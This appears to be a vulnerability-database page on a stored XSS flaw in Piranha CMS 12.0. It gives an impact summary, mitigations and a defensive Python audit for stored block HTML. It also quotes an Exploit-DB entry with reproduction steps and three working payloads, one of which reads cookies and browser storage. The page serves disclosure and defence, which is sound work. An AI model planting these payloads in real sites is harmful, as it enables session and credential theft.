Piranha CMS 12.0 - Stored XSS in Text Block
AI Analysis
Technical Summary
The vulnerability in Piranha CMS 12.0 is a stored XSS issue within the Text Block feature. Stored XSS occurs when malicious script code is saved on the server and later rendered in users' browsers, potentially leading to session hijacking, defacement, or other script-based attacks. The available exploit demonstrates how this vulnerability can be triggered. No affected versions beyond 12.0 are specified, and no vendor advisory or patch information is currently available.
Potential Impact
Successful exploitation could allow attackers to execute arbitrary JavaScript in the context of users viewing the compromised Text Block content. This can lead to theft of user credentials, session tokens, or other sensitive information accessible via the browser. However, no evidence of active exploitation has been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, users should consider applying input validation or output encoding workarounds if possible, or restrict access to content editing features to trusted users only.
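An audit of already-stored Text block bodies for the three markup classes used in the reproduction steps on this page (inline event-handler attributes, an iframe with a data: URL, and an ontoggle handler on details) can look like the following. This is an added example, not code from Piranha CMS or from the advisory; how block bodies are exported from the CMS is not described on the page, so the block ids and sample rows are constructed assumptions.

```python
from html.parser import HTMLParser

URL_ATTRS = {"src", "href", "action", "formaction", "data"}
RISKY_SCHEMES = {"javascript", "data", "vbscript"}
RISKY_TAGS = {"script", "iframe", "object", "embed"}


class BlockAuditor(HTMLParser):
    """Collects (reason, tag, attribute) findings for one stored HTML fragment."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so "ONERROR" is caught too.
        if tag in RISKY_TAGS:
            self.findings.append(("risky-element", tag, None))
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(("event-handler", tag, name))
            elif name in URL_ATTRS and value:
                # Drop whitespace/control characters, which browsers strip from URLs.
                compact = "".join(ch for ch in value if ch > " ")
                scheme = compact.split(":", 1)[0].lower() if ":" in compact else ""
                if scheme in RISKY_SCHEMES:
                    self.findings.append(("risky-scheme", tag, name))


def audit_block(html):
    """Return the findings for one stored block body (empty list means clean)."""
    auditor = BlockAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


def audit_blocks(blocks):
    """Map block id -> findings, keeping only the blocks that were flagged."""
    flagged = {bid: audit_block(body) for bid, body in blocks.items()}
    return {bid: found for bid, found in flagged.items() if found}


# Constructed sample rows, shaped after the three payload classes on this page.
SAMPLE_BLOCKS = {
    "block-1": '<p>Release notes for <a href="https://example.org/v2">v2</a></p>',
    "block-2": '<img src="x" onerror="alert(1)" />',
    "block-3": '<iframe src="data:text/html;base64,AAAA"></iframe>',
    "block-4": "<details open ontoggle=alert(1)>Click</details>",
}
```

A finding marks a block for review; this is an audit pass over stored content and does not replace output encoding or an allow-list sanitizer at render time.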
Indicators of Compromise
- exploit-code:

# Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting
# Date: 2025-09-26
# Exploit Author: Chidubem Chukwu (Terminal Venom)
# LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9?
# Vendor Homepage: https://piranhacms.org
# Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
# Version: 12.0
# Category: Web Application
# Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome
# CVE: CVE-2025-57692
# Privilege Level: authenticated user
# Patched Version: Not available
# Exploit link: https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md

## Reproduction Steps ##

PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via /manager/pages, enabling execution of arbitrary JavaScript in another user's browser.

Reproduction steps

1. Log in to the Piranha admin panel at https://<host>/manager/login.
2. Navigate to Pages.
3. Click Add Page and choose Standard Page or Standard Archive.
4. Enter a page title (e.g., XSS-Test).
5. Click the [ + ] button and select Text under Content to add a Text block.
6. In the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted/saved and will also execute for anyone who later accesses or previews the page.

Payload A

<img src="x" onerror="
alert(
  'Cookies: ' + document.cookie + '\n' +
  'LocalStorage: ' + JSON.stringify(localStorage) + '\n' +
  'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' +
  'URL: ' + window.location.href + '\n' +
  'User Agent: ' + navigator.userAgent + '\n' +
  'Time: ' + new Date().toLocaleString()
)
" />

Payload B — iframe base64

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>

Payload C — details toggle (on-toggle alert)

<details open ontoggle=alert('XSS')>Click</details>

7. Click Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others).
8. Anyone who accesses the page (or pastes the payload) will trigger the XSS.
Technical Details
- Edb Id: 52471
- Has Exploit Code: true
- Code Language: text
Threat ID: 6981b62cf9fa50a62fb223fb
Added to database: 2/3/2026, 8:47:40 AM
Last enriched: 4/7/2026, 11:05:15 AM
Last updated: 5/8/2026, 11:36:20 PM